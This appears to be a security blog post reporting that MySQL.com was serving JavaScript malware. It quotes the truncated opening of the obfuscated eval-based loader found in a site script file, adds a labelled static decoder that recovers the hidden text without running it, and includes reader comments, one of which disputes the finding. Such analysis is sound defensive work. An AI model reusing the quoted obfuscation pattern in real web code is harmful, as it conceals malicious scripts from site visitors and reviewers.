MySQL.com Hacked (Javascript Malware)

It looks like the MySQL.com website is currently hacked and compromised with JavaScript malware, and it is serving that malware to anyone who visits it.

Our scanner identified the malware as mwjs159, which is often related to stolen FTP passwords. So it looks like one of their developers had a desktop compromised and a password stolen. From our scanner:

So the compromised file was http://mysql.com/common/js/s_code_remote.js and we recommend that you do not visit the site right now. We will post more details as we learn more about it…

(Seems that MySQL.com fixed it already.) Try view-source:http://mysql.com/common/js/s_code_remote.js if you want to see the malicious code on the site. It starts as:

Object.prototype.qwe=function(){return String.fromCharCode;};Object.prototype.asd="e";var s="";
try{{}["qwtqwt"]();}catch(q){if(q)r=1;}
if(r&&+new Object(1231)&&document.createTextNode("123").data&&typeof{}.asd.vfr==='undefined')n=2;
e=eval;m=[18/n,18/n,210/n,204/n,64/n,80/n,200/n, 222/n, 198/n, 234/n, 218/n, 202/n, 220/n, 232/n, 92/n, 206/n, 202/n,232/n, …
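A sample like this can be inspected without running it, because the hidden script is just the `m` array of character codes multiplied by `n`, and `n` is only set once the browser checks pass. The following is an added example, not code from the original post or from the scanner it mentions; the function names are illustrative, and the input is only the truncated fragment quoted above, so it recovers just the start of the hidden script.

```javascript
// Added example: static decoding of a "<number>/n" char-code array. Nothing is eval'd.
// SAMPLE is the fragment visible in the post (truncated there, so the output is partial).
const SAMPLE = 'e=eval;m=[18/n,18/n,210/n,204/n,64/n,80/n,200/n, 222/n, 198/n, ' +
  '234/n, 218/n, 202/n, 220/n, 232/n, 92/n, 206/n, 202/n,232/n,';

// Pull the numerators out of every "<int>/n" term, in source order.
function extractNumerators(src) {
  const out = [];
  const re = /(\d+)\s*\/\s*n\b/g;
  let match;
  while ((match = re.exec(src)) !== null) out.push(Number(match[1]));
  return out;
}

// True for tab, LF, CR and printable ASCII: what script text should consist of.
function isTextCode(c) {
  return Number.isInteger(c) &&
    (c === 9 || c === 10 || c === 13 || (c >= 32 && c <= 126));
}

// The sample leaves n undefined unless its environment checks pass, so recover n
// by trying small divisors and keeping those where every value is a text char code.
function decodeCandidates(src, maxDivisor = 16) {
  const nums = extractNumerators(src);
  const found = [];
  if (nums.length === 0) return found;
  for (let n = 1; n <= maxDivisor; n++) {
    const codes = nums.map((v) => v / n);
    if (codes.every(isTextCode)) {
      found.push({ n, text: String.fromCharCode(...codes) });
    }
  }
  return found;
}

// Print each plausible decoding; JSON.stringify makes tabs and newlines visible.
for (const { n, text } of decodeCandidates(SAMPLE)) {
  console.log(`n=${n}: ${JSON.stringify(text)}`);
}
```

Running the same function over a full copy of a suspect file shows the complete decoded payload as text, which can then be reviewed or matched against signatures.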

Update: It seems that MySQL.com fixed it already.

17 comments
  1. Ok a lot of assumptions are being made here and that “malicious” section doesn’t exist within the s_code_remote.js file you reference. However Google *is* currently flagging a large section of the Bahnhof network as malicious. However it has nothing pointing out any specific MySQL sites being involved. MySQL.com is a client on Bahnhof and is being flagged as collateral damage.

    See:
    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://forums.mysql.com/

  2. There is an error in your CSS that hides the sharing bar when it is at the top (at least in Google Chrome 14). To fix it just remove the line “overflow: hidden;” on line 467 of style.css.

  3. The saddest and most hated thing on the web for me is that way of hacking. I just don’t understand doing such a thing. jvmhost
